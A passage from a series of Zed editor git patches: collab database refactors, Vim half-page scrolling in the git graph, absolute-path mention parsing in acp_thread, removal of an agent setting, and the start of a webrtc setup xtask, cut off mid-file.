+++++++------- 2 files changed, 10 insertions(+), 32 deletions(-) diff --git a/crates/collab/src/db/queries/contributors.rs b/crates/collab/src/db/queries/contributors.rs index d5cc03e69d5bde..2c1cc710061c4e 100644 --- a/crates/collab/src/db/queries/contributors.rs +++ b/crates/collab/src/db/queries/contributors.rs @@ -3,30 +3,10 @@ use super::*; impl Database { /// Records that a given user has signed the CLA. #[cfg(feature = "test-support")] - pub async fn add_contributor( - &self, - github_login: &str, - github_user_id: i32, - github_email: Option<&str>, - github_name: Option<&str>, - github_user_created_at: DateTimeUtc, - initial_channel_id: Option, - ) -> Result<()> { + pub async fn add_contributor(&self, user_id: UserId) -> Result<()> { self.transaction(|tx| async move { - let user = self - .update_or_create_user_by_github_account_tx( - github_login, - github_user_id, - github_email, - github_name, - github_user_created_at.naive_utc(), - initial_channel_id, - &tx, - ) - .await?; - contributor::Entity::insert(contributor::ActiveModel { - user_id: ActiveValue::Set(user.id), + user_id: ActiveValue::Set(user_id), signed_at: ActiveValue::NotSet, }) .on_conflict( diff --git a/crates/collab/tests/integration/channel_guest_tests.rs b/crates/collab/tests/integration/channel_guest_tests.rs index 85d69914a832c6..95b1eeca5fc905 100644 --- a/crates/collab/tests/integration/channel_guest_tests.rs +++ b/crates/collab/tests/integration/channel_guest_tests.rs @@ -1,6 +1,5 @@ use crate::TestServer; use call::ActiveCall; -use chrono::Utc; use collab::db::ChannelId; use editor::Editor; use gpui::{BackgroundExecutor, TestAppContext}; @@ -183,14 +182,6 @@ async fn test_channel_guest_promotion(cx_a: &mut TestAppContext, cx_b: &mut Test #[gpui::test] async fn test_channel_requires_zed_cla(cx_a: &mut TestAppContext, cx_b: &mut TestAppContext) { let mut server = TestServer::start(cx_a.executor()).await; - - server - .app_state - .db - .update_or_create_user_by_github_account("user_b", 100, None, None, Utc::now(), None) - .await - .unwrap(); - let client_a = server.create_client(cx_a, "user_a").await; let client_b = server.create_client(cx_b, "user_b").await; let active_call_a = cx_a.read(ActiveCall::global); @@ -288,10 +279,17 @@ async fn test_channel_requires_zed_cla(cx_a: &mut TestAppContext, cx_b: &mut Tes }); // User B signs the zed CLA. + let user_b = server + .app_state + .db + .get_user_by_github_login("user_b") + .await + .unwrap() + .expect("user_b not found"); server .app_state .db - .add_contributor("user_b", 100, None, None, Utc::now(), None) + .add_contributor(user_b.id) .await .unwrap(); From 49b8841f50dd69306fe1b72611a6e7f66ff5ec22 Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Sun, 3 May 2026 17:37:45 +0200 Subject: [PATCH 138/231] collab: Remove tests for `update_or_create_user_by_github_account` (#55559) This PR removes the tests for the `update_or_create_user_by_github_account` method, as it is not called outside of tests/seeding in local development. Release Notes: - N/A --- .../tests/integration/db_tests/db_tests.rs | 64 ------------------- 1 file changed, 64 deletions(-) diff --git a/crates/collab/tests/integration/db_tests/db_tests.rs b/crates/collab/tests/integration/db_tests/db_tests.rs index 710f95dbf7d82e..a8724a90ec4ab0 100644 --- a/crates/collab/tests/integration/db_tests/db_tests.rs +++ b/crates/collab/tests/integration/db_tests/db_tests.rs @@ -1,7 +1,6 @@ use crate::test_both_dbs; use super::*; -use chrono::Utc; use collab::db::RoomId; use collab::db::*; use pretty_assertions::assert_eq; @@ -73,69 +72,6 @@ async fn test_get_users(db: &Arc) { ); } -test_both_dbs!( - test_update_or_create_user_by_github_account, - test_update_or_create_user_by_github_account_postgres, - test_update_or_create_user_by_github_account_sqlite -); - -async fn test_update_or_create_user_by_github_account(db: &Arc) { - db.create_user( - "user1@example.com", - None, - false, - NewUserParams { - github_login: "login1".into(), - github_user_id: 101, - }, - ) - .await - .unwrap(); - let user_id2 = db - .create_user( - "user2@example.com", - None, - false, - NewUserParams { - github_login: "login2".into(), - github_user_id: 102, - }, - ) - .await - .unwrap() - .user_id; - - let user = db - .update_or_create_user_by_github_account( - "the-new-login2", - 102, - None, - None, - Utc::now(), - None, - ) - .await - .unwrap(); - assert_eq!(user.id, user_id2); - assert_eq!(&user.github_login, "the-new-login2"); - assert_eq!(user.github_user_id, 102); - - let user = db - .update_or_create_user_by_github_account( - "login3", - 103, - Some("user3@example.com"), - None, - Utc::now(), - None, - ) - .await - .unwrap(); - assert_eq!(&user.github_login, "login3"); - assert_eq!(user.github_user_id, 103); - assert_eq!(user.email_address, Some("user3@example.com".into())); -} - test_both_dbs!( test_add_contacts, test_add_contacts_postgres, From 077b36bca17216b9433b76083949bb599f7dc9a9 Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Sun, 3 May 2026 18:45:40 +0200 Subject: [PATCH 139/231] collab: Remove stray `dev_servers.rs` module (#55566) This PR removes a stray, empty `dev_servers.rs` module from the `collab` crate. Release Notes: - N/A --- crates/collab/src/db/queries/dev_servers.rs | 1 - 1 file changed, 1 deletion(-) delete mode 100644 crates/collab/src/db/queries/dev_servers.rs diff --git a/crates/collab/src/db/queries/dev_servers.rs b/crates/collab/src/db/queries/dev_servers.rs deleted file mode 100644 index 8b137891791fe9..00000000000000 --- a/crates/collab/src/db/queries/dev_servers.rs +++ /dev/null @@ -1 +0,0 @@ - From e39c55af813ef720642973739adac0f17525e7b1 Mon Sep 17 00:00:00 2001 From: aprogramq <70436334+aprogramq@users.noreply.github.com> Date: Sun, 3 May 2026 20:19:47 +0300 Subject: [PATCH 140/231] git_graph: Improve navigation in Vim mode (#55506) Added Ctrl-D/Ctrl-U for Vim navigation in the Git graph https://github.com/user-attachments/assets/8d3ad67c-829a-4a80-9508-80d48cf0decf Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #55485 Release Notes: - Improved Vim navigation in the git graph with Ctrl-U and Ctrl-D half-page scrolling. --------- Co-authored-by: Anthony Eid --- assets/keymaps/vim.json | 2 + crates/git_graph/src/git_graph.rs | 91 +++++++++++++++++++++++++++++-- 2 files changed, 87 insertions(+), 6 deletions(-) diff --git a/assets/keymaps/vim.json b/assets/keymaps/vim.json index 6e52ac3ce63b9d..88e8e35204042c 100644 --- a/assets/keymaps/vim.json +++ b/assets/keymaps/vim.json @@ -1052,6 +1052,8 @@ "bindings": { "j": "vim::MenuSelectNext", "k": "vim::MenuSelectPrevious", + "ctrl-d": "git_graph::ScrollDown", + "ctrl-u": "git_graph::ScrollUp", "shift-g": "menu::SelectLast", "g g": "menu::SelectFirst" } diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index 1f7d4b886619cf..5a7e7a30294236 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -286,6 +286,10 @@ actions!( FocusNextTabStop, /// Focuses the previous git graph tab stop. FocusPreviousTabStop, + /// Selects a commit half a page above the current selection. + ScrollUp, + /// Selects a commit half a page below the current selection. + ScrollDown, ] ); @@ -1025,6 +1029,20 @@ impl GitGraph { (raw * scale).round() / scale } + fn visible_row_count(&self, window: &Window, cx: &App) -> usize { + let row_height = Self::row_height(window, cx); + let viewport_height = self + .table_interaction_state + .read(cx) + .scroll_handle + .0 + .borrow() + .last_item_size + .map_or(window.viewport_size().height, |size| size.item.height); + + ((viewport_height / row_height).ceil() as usize).min(self.graph_data.commits.len()) + } + fn graph_canvas_content_width(&self) -> Pixels { (LANE_WIDTH * self.graph_data.max_lanes.max(6) as f32) + LEFT_PADDING * 2.0 } @@ -1534,6 +1552,28 @@ impl GitGraph { ); } + fn scroll_up(&mut self, _: &ScrollUp, window: &mut Window, cx: &mut Context) { + let step = (self.visible_row_count(window, cx) / 2).max(1); + let target_idx = self.selected_entry_idx.unwrap_or(0).saturating_sub(step); + + self.select_entry(target_idx, ScrollStrategy::Nearest, cx); + } + + fn scroll_down(&mut self, _: &ScrollDown, window: &mut Window, cx: &mut Context) { + let Some(last_entry_idx) = self.graph_data.commits.len().checked_sub(1) else { + return; + }; + + let step = (self.visible_row_count(window, cx) / 2).max(1); + let target_idx = self + .selected_entry_idx + .unwrap_or(0) + .saturating_add(step) + .min(last_entry_idx); + + self.select_entry(target_idx, ScrollStrategy::Nearest, cx); + } + fn confirm(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { self.open_selected_commit_view(window, cx); } @@ -1649,7 +1689,12 @@ impl GitGraph { scroll_strategy: ScrollStrategy, cx: &mut Context, ) { - if self.selected_entry_idx == Some(idx) { + if self.selected_entry_idx == Some(idx) || idx >= self.graph_data.commits.len() { + debug_assert!( + idx < self.graph_data.commits.len(), + "attempted to select out of bounds index: {idx}, commits.len: {}", + self.graph_data.commits.len() + ); return; } @@ -2345,6 +2390,7 @@ impl GitGraph { fn render_graph_canvas(&self, window: &Window, cx: &mut Context) -> impl IntoElement { let row_height = Self::row_height(window, cx); + let visible_row_count = self.visible_row_count(window, cx); let table_state = self.table_interaction_state.read(cx); let viewport_height = table_state .scroll_handle @@ -2368,8 +2414,7 @@ impl GitGraph { } else { graph_viewport_width }; - let last_visible_row = - first_visible_row + (viewport_height / row_height).ceil() as usize + 1; + let last_visible_row = first_visible_row + visible_row_count + 1; let viewport_range = first_visible_row.min(loaded_commit_count.saturating_sub(1)) ..(last_visible_row).min(loaded_commit_count); @@ -3023,6 +3068,8 @@ impl Render for GitGraph { .on_action(cx.listener(Self::select_prev)) .on_action(cx.listener(Self::select_next)) .on_action(cx.listener(Self::select_last)) + .on_action(cx.listener(Self::scroll_up)) + .on_action(cx.listener(Self::scroll_down)) .on_action(cx.listener(Self::confirm)) .on_action(cx.listener(Self::focus_next_tab_stop)) .on_action(cx.listener(Self::focus_previous_tab_stop)) @@ -5173,8 +5220,8 @@ mod tests { workspace::MultiWorkspace::test_new(project.clone(), window, cx) }); - let workspace_weak = - multi_workspace.read_with(&*cx, |multi, _| multi.workspace().downgrade()); + let workspace = multi_workspace.read_with(&*cx, |multi, _| multi.workspace().clone()); + let workspace_weak = workspace.downgrade(); let git_graph = cx.new_window_entity(|window, cx| { GitGraph::new( @@ -5188,6 +5235,11 @@ mod tests { }); cx.run_until_parked(); + workspace.update_in(cx, |workspace, window, cx| { + workspace.add_item_to_active_pane(Box::new(git_graph.clone()), None, true, window, cx); + }); + cx.run_until_parked(); + git_graph.update_in(cx, |graph, window, cx| { graph.focus_handle(cx).focus(window, cx); }); @@ -5196,10 +5248,15 @@ mod tests { cx.draw( point(px(0.), px(0.)), gpui::size(px(1200.), px(800.)), - |_, _| git_graph.clone().into_any_element(), + |_, _| multi_workspace.clone().into_any_element(), ); cx.run_until_parked(); + git_graph.update_in(cx, |graph, window, cx| { + graph.focus_handle(cx).focus(window, cx); + }); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { assert_eq!(graph.graph_data.commits.len(), 10); }); @@ -5215,6 +5272,22 @@ mod tests { assert_eq!(graph.selected_entry_idx, Some(0)); }); + let scroll_step = git_graph.update_in(cx, |graph, window, cx| { + (graph.visible_row_count(window, cx) / 2).max(1) + }); + + cx.dispatch_action(ScrollDown); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(scroll_step)); + }); + + cx.dispatch_action(ScrollUp); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(0)); + }); + git_graph.update_in(cx, |graph, window, cx| { graph.select_next(&menu::SelectNext, window, cx); }); @@ -5239,6 +5312,12 @@ mod tests { assert_eq!(graph.selected_entry_idx, Some(9)); }); + cx.dispatch_action(ScrollDown); + cx.run_until_parked(); + git_graph.read_with(&*cx, |graph, _| { + assert_eq!(graph.selected_entry_idx, Some(9)); + }); + git_graph.update_in(cx, |graph, window, cx| { graph.select_next(&menu::SelectNext, window, cx); }); From a1e2258227e380e5f212072dfdb2d2b5083da113 Mon Sep 17 00:00:00 2001 From: Revantark Date: Mon, 4 May 2026 00:41:53 +0530 Subject: [PATCH 141/231] acp_thread: Support absolute file mentions with row fragments (#53229) Sometimes the contents in the agent's thread are direct file links. Codex ACP almost every time uses absolute file paths instead of file://path/to/file. This is resulting in an error described in the #49978 . Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #49978 Release Notes: - Fixed absolute path mentions in `acp_thread` so direct file references (including `:line` and `#Lline` formats) now open correctly instead of resolving to invalid/empty files. --------- Co-authored-by: Eric Holk --- crates/acp_thread/src/mention.rs | 190 ++++++++++++++++++++++++++++++- 1 file changed, 189 insertions(+), 1 deletion(-) diff --git a/crates/acp_thread/src/mention.rs b/crates/acp_thread/src/mention.rs index 403b71736c9470..4d52c202c633e4 100644 --- a/crates/acp_thread/src/mention.rs +++ b/crates/acp_thread/src/mention.rs @@ -12,7 +12,10 @@ use std::{ use ui::{App, IconName, SharedString}; use url::Url; use urlencoding::decode; -use util::{ResultExt, paths::PathStyle}; +use util::{ + ResultExt, + paths::{PathStyle, PathWithPosition, is_absolute}, +}; #[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize, Hash)] pub enum MentionUri { @@ -65,6 +68,11 @@ pub enum MentionUri { impl MentionUri { pub fn parse(input: &str, path_style: PathStyle) -> Result { + let input = input + .strip_prefix('`') + .and_then(|input| input.strip_suffix('`')) + .unwrap_or(input); + fn parse_line_range(fragment: &str) -> Result> { let range = fragment.strip_prefix("L").unwrap_or(fragment); @@ -92,6 +100,39 @@ impl MentionUri { Ok(start_line..=end_line) } + let parse_absolute_path = |input: &str| -> Result { + let (path_input, fragment) = input + .split_once('#') + .map_or((input, None), |(path, fragment)| (path, Some(fragment))); + + if let Some(fragment) = fragment.and_then(|fragment| parse_line_range(fragment).ok()) { + return Ok(MentionUri::Selection { + abs_path: Some(path_input.into()), + line_range: fragment, + }); + } + + let path_with_position = PathWithPosition::parse_str(path_input); + let abs_path = path_with_position.path; + if let Some(row) = path_with_position.row { + let line = row + .checked_sub(1) + .context("Line numbers should be 1-based")?; + // TODO: Preserve column info too. + Ok(MentionUri::Selection { + abs_path: Some(abs_path), + line_range: line..=line, + }) + } else { + Ok(MentionUri::File { abs_path }) + } + }; + + if is_absolute(input, path_style) && !input.contains("://") { + return parse_absolute_path(input) + .with_context(|| format!("Invalid absolute path mention URI: {input}")); + } + let url = url::Url::parse(input)?; let path = url.path(); match url.scheme() { @@ -737,6 +778,153 @@ mod tests { assert!(MentionUri::parse("zed:///agent/unknown/test", PathStyle::local()).is_err()); } + #[test] + fn test_parse_absolute_file_path() { + let file_path = path!("/path/to/file.rs"); + let parsed = MentionUri::parse(file_path, PathStyle::local()).unwrap(); + match &parsed { + MentionUri::File { abs_path } => { + assert_eq!(abs_path, Path::new(file_path)); + } + _ => panic!("Expected File variant"), + } + } + + #[test] + fn test_parse_absolute_file_path_with_row() { + let file_path = "/path/to/file.rs:42"; + let parsed = MentionUri::parse(file_path, PathStyle::Posix).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!(path.as_ref().unwrap(), Path::new("/path/to/file.rs")); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + + #[test] + fn test_parse_absolute_file_path_with_fragment_line() { + let file_path = "/path/to/file.rs#L42"; + let parsed = MentionUri::parse(file_path, PathStyle::Posix).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!(path.as_ref().unwrap(), Path::new("/path/to/file.rs")); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + + #[test] + fn test_parse_absolute_windows_path() { + let file_path = "C:\\Users\\zed\\project\\main.rs"; + let parsed = MentionUri::parse(file_path, PathStyle::Windows).unwrap(); + match &parsed { + MentionUri::File { abs_path } => { + assert_eq!(abs_path, Path::new("C:\\Users\\zed\\project\\main.rs")); + } + _ => panic!("Expected File variant"), + } + } + + #[test] + fn test_parse_absolute_windows_file_path_with_row() { + let file_path = "C:\\Users\\zed\\project\\main.rs:42"; + let parsed = MentionUri::parse(file_path, PathStyle::Windows).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!( + path.as_ref().unwrap(), + Path::new("C:\\Users\\zed\\project\\main.rs") + ); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + + #[test] + fn test_parse_absolute_windows_file_path_with_fragment_line() { + let file_path = "C:\\Users\\zed\\project\\main.rs#L42"; + let parsed = MentionUri::parse(file_path, PathStyle::Windows).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!( + path.as_ref().unwrap(), + Path::new("C:\\Users\\zed\\project\\main.rs") + ); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + + #[test] + fn test_parse_backticked_absolute_file_path() { + let file_path = "`/path/to/file.rs`"; + let parsed = MentionUri::parse(file_path, PathStyle::Posix).unwrap(); + match &parsed { + MentionUri::File { abs_path } => { + assert_eq!(abs_path, Path::new("/path/to/file.rs")); + } + _ => panic!("Expected File variant"), + } + } + + #[test] + fn test_parse_backticked_absolute_file_path_with_fragment_line() { + let file_path = "`/path/to/file.rs#L42`"; + let parsed = MentionUri::parse(file_path, PathStyle::Posix).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!(path.as_ref().unwrap(), Path::new("/path/to/file.rs")); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + + #[test] + fn test_parse_backticked_absolute_windows_file_path_with_fragment_line() { + let file_path = "`C:\\Users\\zed\\project\\main.rs#L42`"; + let parsed = MentionUri::parse(file_path, PathStyle::Windows).unwrap(); + match &parsed { + MentionUri::Selection { + abs_path: path, + line_range, + } => { + assert_eq!( + path.as_ref().unwrap(), + Path::new("C:\\Users\\zed\\project\\main.rs") + ); + assert_eq!(line_range.start(), &41); + assert_eq!(line_range.end(), &41); + } + _ => panic!("Expected Selection variant"), + } + } + #[test] fn test_single_line_number() { // https://github.com/zed-industries/zed/issues/46114 From 201516607db69b2eb7c3a4918cb11c1ae83b7d36 Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Sun, 3 May 2026 21:30:04 +0200 Subject: [PATCH 142/231] agent: Remove new thread location setting (#55575) cc: @danilo-leal This setting is from when we had the git worktree picker in the agent panel, now that it is in the menu bar it doesn't make sense to keep it. We plan to add a similar feature in the future to handle the "new thread == new git worktree" workflow Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- assets/settings/default.json | 4 --- crates/agent/src/tool_permissions.rs | 1 - crates/agent_settings/src/agent_settings.rs | 4 +-- crates/agent_ui/src/agent_ui.rs | 1 - crates/agent_ui/src/conversation_view.rs | 8 ++---- crates/settings_content/src/agent.rs | 32 --------------------- crates/settings_ui/src/page_data.rs | 23 --------------- crates/settings_ui/src/settings_ui.rs | 1 - 8 files changed, 3 insertions(+), 71 deletions(-) diff --git a/assets/settings/default.json b/assets/settings/default.json index d2bec7226627e2..54b9070da2be39 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -1152,10 +1152,6 @@ "tools": {}, }, }, - // Whether to start a new thread in the current local project or in a new Git worktree. - // - // Default: local_project - "new_thread_location": "local_project", // Where to show notifications when the agent has either completed // its response, or else needs confirmation before it can run a // tool action. diff --git a/crates/agent/src/tool_permissions.rs b/crates/agent/src/tool_permissions.rs index 65cbcfb2c609cb..2d3638265f758f 100644 --- a/crates/agent/src/tool_permissions.rs +++ b/crates/agent/src/tool_permissions.rs @@ -597,7 +597,6 @@ mod tests { tool_permissions, show_turn_stats: false, show_merge_conflict_indicator: true, - new_thread_location: Default::default(), sidebar_side: Default::default(), thinking_display: Default::default(), } diff --git a/crates/agent_settings/src/agent_settings.rs b/crates/agent_settings/src/agent_settings.rs index 5dd939c4ad1d5d..37648997c3bb43 100644 --- a/crates/agent_settings/src/agent_settings.rs +++ b/crates/agent_settings/src/agent_settings.rs @@ -13,7 +13,7 @@ use project::DisableAiSettings; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings::{ - DockPosition, DockSide, LanguageModelParameters, LanguageModelSelection, NewThreadLocation, + DockPosition, DockSide, LanguageModelParameters, LanguageModelSelection, NotifyWhenAgentWaiting, PlaySoundWhenAgentDone, RegisterSetting, Settings, SettingsContent, SettingsStore, SidebarDockPosition, SidebarSide, ThinkingBlockDisplay, ToolPermissionMode, update_settings_file, update_settings_file_with_completion, @@ -167,7 +167,6 @@ pub struct AgentSettings { pub show_turn_stats: bool, pub show_merge_conflict_indicator: bool, pub tool_permissions: ToolPermissions, - pub new_thread_location: NewThreadLocation, } impl AgentSettings { @@ -671,7 +670,6 @@ impl Settings for AgentSettings { show_turn_stats: agent.show_turn_stats.unwrap(), show_merge_conflict_indicator: agent.show_merge_conflict_indicator.unwrap(), tool_permissions: compile_tool_permissions(agent.tool_permissions), - new_thread_location: agent.new_thread_location.unwrap_or_default(), } } } diff --git a/crates/agent_ui/src/agent_ui.rs b/crates/agent_ui/src/agent_ui.rs index 449194a738070f..226471fc024294 100644 --- a/crates/agent_ui/src/agent_ui.rs +++ b/crates/agent_ui/src/agent_ui.rs @@ -713,7 +713,6 @@ mod tests { tool_permissions: Default::default(), show_turn_stats: false, show_merge_conflict_indicator: true, - new_thread_location: Default::default(), sidebar_side: Default::default(), thinking_display: Default::default(), }; diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index c6ce183863ba84..c1a975939f6275 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -48,8 +48,7 @@ use crate::DEFAULT_THREAD_TITLE; use crate::message_editor::SessionCapabilities; use rope::Point; use settings::{ - NewThreadLocation, NotifyWhenAgentWaiting, Settings as _, SettingsStore, SidebarSide, - ThinkingBlockDisplay, + NotifyWhenAgentWaiting, Settings as _, SettingsStore, SidebarSide, ThinkingBlockDisplay, }; use std::path::Path; use std::sync::Arc; @@ -862,10 +861,7 @@ impl ConversationView { SidebarSide::Left => "left", SidebarSide::Right => "right", }; - let thread_location = match AgentSettings::get_global(cx).new_thread_location { - NewThreadLocation::LocalProject => "current_worktree", - NewThreadLocation::NewWorktree => "new_worktree", - }; + let thread_location = "current_worktree"; let load_task = cx.spawn_in(window, async move |this, cx| { let connection = match connect_result.await { diff --git a/crates/settings_content/src/agent.rs b/crates/settings_content/src/agent.rs index 2cdeb1e94e1a0b..26b563e0842708 100644 --- a/crates/settings_content/src/agent.rs +++ b/crates/settings_content/src/agent.rs @@ -9,30 +9,6 @@ use crate::ExtendingVec; use crate::DockPosition; -/// Where new threads should start by default. -#[derive( - Clone, - Copy, - Debug, - Default, - PartialEq, - Eq, - Serialize, - Deserialize, - JsonSchema, - MergeFrom, - strum::VariantArray, - strum::VariantNames, -)] -#[serde(rename_all = "snake_case")] -pub enum NewThreadLocation { - /// Start threads in the current project. - #[default] - LocalProject, - /// Start threads in a new worktree. - NewWorktree, -} - /// Where to position the threads sidebar. #[derive( Clone, @@ -161,10 +137,6 @@ pub struct AgentSettingsContent { /// /// Default: write pub default_profile: Option>, - /// Where new threads should start by default. - /// - /// Default: "local_project" - pub new_thread_location: Option, /// The available agent profiles. pub profiles: Option, AgentProfileContent>>, /// Where to show a popup notification when the agent is waiting for user input. @@ -270,10 +242,6 @@ impl AgentSettingsContent { self.default_profile = Some(profile_id); } - pub fn set_new_thread_location(&mut self, value: NewThreadLocation) { - self.new_thread_location = Some(value); - } - pub fn add_favorite_model(&mut self, model: LanguageModelSelection) { // Note: this is intentional to not compare using `PartialEq`here. // Full equality would treat entries that differ just in thinking/effort/speed diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index 99dd77b84aebb4..112aa5f5716563 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -7429,29 +7429,6 @@ fn ai_page(cx: &App) -> SettingsPage { }), ]; - items.push(SettingsPageItem::SettingItem(SettingItem { - title: "New Thread Location", - description: "Whether to start a new thread in the current local project or in a new Git worktree.", - field: Box::new(SettingField { - json_path: Some("agent.new_thread_location"), - pick: |settings_content| { - settings_content - .agent - .as_ref()? - .new_thread_location - .as_ref() - }, - write: |settings_content, value, _| { - settings_content - .agent - .get_or_insert_default() - .new_thread_location = value; - }, - }), - metadata: None, - files: USER, - })); - items.extend([ SettingsPageItem::SettingItem(SettingItem { title: "Single File Review", diff --git a/crates/settings_ui/src/settings_ui.rs b/crates/settings_ui/src/settings_ui.rs index a718e1277efca6..d22687b0b757d4 100644 --- a/crates/settings_ui/src/settings_ui.rs +++ b/crates/settings_ui/src/settings_ui.rs @@ -530,7 +530,6 @@ fn init_renderers(cx: &mut App) { .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) - .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) .add_basic_renderer::(render_dropdown) From 0e1a9f028f5d67815fd2e59115e3e170c0d3ce29 Mon Sep 17 00:00:00 2001 From: Piotr Osiewicz <24362066+osiewicz@users.noreply.github.com> Date: Mon, 4 May 2026 08:22:51 +0200 Subject: [PATCH 143/231] =?UTF-8?q?build:=20Allow=20pinning=20of=20webrtc?= =?UTF-8?q?=20build=20artifacts=20(=E2=9C=88=EF=B8=8F=20edition)=20(#55336?= =?UTF-8?q?)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit tl;dr: you can now run `cargo xtask setup_webrtc`, which: 1. Fetches webrtc artifacts into a gitignored directory in Zed repo 2. Adds a [env] section to `~/.cargo/config.toml` on your box which forces LK to NOT download webrtc artifacts as a part of its build script The end result: `cargo clean` is no longer a horrid experience with in horrid network environments. Caveats: 1. This does not handle appending to existing cargo config. The setup script will fail if there's one in place. 2. You need to redo this thing (fetch env var and whatnot) whenever LK version is bumped. 3. This is not mandatory for builds to work. You only really have to do this for your own convenience, but builds will work just fine without it (unless your connection sucks). Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- .gitignore | 1 + tooling/xtask/src/main.rs | 3 + tooling/xtask/src/tasks.rs | 1 + tooling/xtask/src/tasks/setup_webrtc.rs | 249 ++++++++++++++++++++++++ 4 files changed, 254 insertions(+) create mode 100644 tooling/xtask/src/tasks/setup_webrtc.rs diff --git a/.gitignore b/.gitignore index ba6b74f6c54b5f..becb768d270acd 100644 --- a/.gitignore +++ b/.gitignore @@ -2,6 +2,7 @@ **/*.proptest-regressions **/cargo-target **/target +.webrtc-sys/ **/venv **/.direnv *.wasm diff --git a/tooling/xtask/src/main.rs b/tooling/xtask/src/main.rs index c442f1c509e281..655401af75929c 100644 --- a/tooling/xtask/src/main.rs +++ b/tooling/xtask/src/main.rs @@ -21,6 +21,8 @@ enum CliCommand { PackageConformity(tasks::package_conformity::PackageConformityArgs), /// Publishes GPUI and its dependencies to crates.io. PublishGpui(tasks::publish_gpui::PublishGpuiArgs), + /// Downloads the pinned `webrtc-sys` release and configures `LK_CUSTOM_WEBRTC`. + SetupWebrtc(tasks::setup_webrtc::SetupWebrtcArgs), /// Builds GPUI web examples and serves them. WebExamples(tasks::web_examples::WebExamplesArgs), Workflows(tasks::workflows::GenerateWorkflowArgs), @@ -38,6 +40,7 @@ fn main() -> Result<()> { tasks::package_conformity::run_package_conformity(args) } CliCommand::PublishGpui(args) => tasks::publish_gpui::run_publish_gpui(args), + CliCommand::SetupWebrtc(args) => tasks::setup_webrtc::run_setup_webrtc(args), CliCommand::WebExamples(args) => tasks::web_examples::run_web_examples(args), CliCommand::Workflows(args) => tasks::workflows::run_workflows(args), CliCommand::CheckWorkflows(args) => tasks::workflow_checks::validate(args), diff --git a/tooling/xtask/src/tasks.rs b/tooling/xtask/src/tasks.rs index ea67d0abc5fcbd..affde2565c403c 100644 --- a/tooling/xtask/src/tasks.rs +++ b/tooling/xtask/src/tasks.rs @@ -3,6 +3,7 @@ pub mod compliance; pub mod licenses; pub mod package_conformity; pub mod publish_gpui; +pub mod setup_webrtc; pub mod web_examples; pub mod workflow_checks; pub mod workflows; diff --git a/tooling/xtask/src/tasks/setup_webrtc.rs b/tooling/xtask/src/tasks/setup_webrtc.rs new file mode 100644 index 00000000000000..756a37678388ba --- /dev/null +++ b/tooling/xtask/src/tasks/setup_webrtc.rs @@ -0,0 +1,249 @@ +#![allow(clippy::disallowed_methods, reason = "tooling is exempt")] + +use std::fs; +use std::path::{Path, PathBuf}; +use std::process::Command; + +use anyhow::{Context as _, Result, bail}; +use 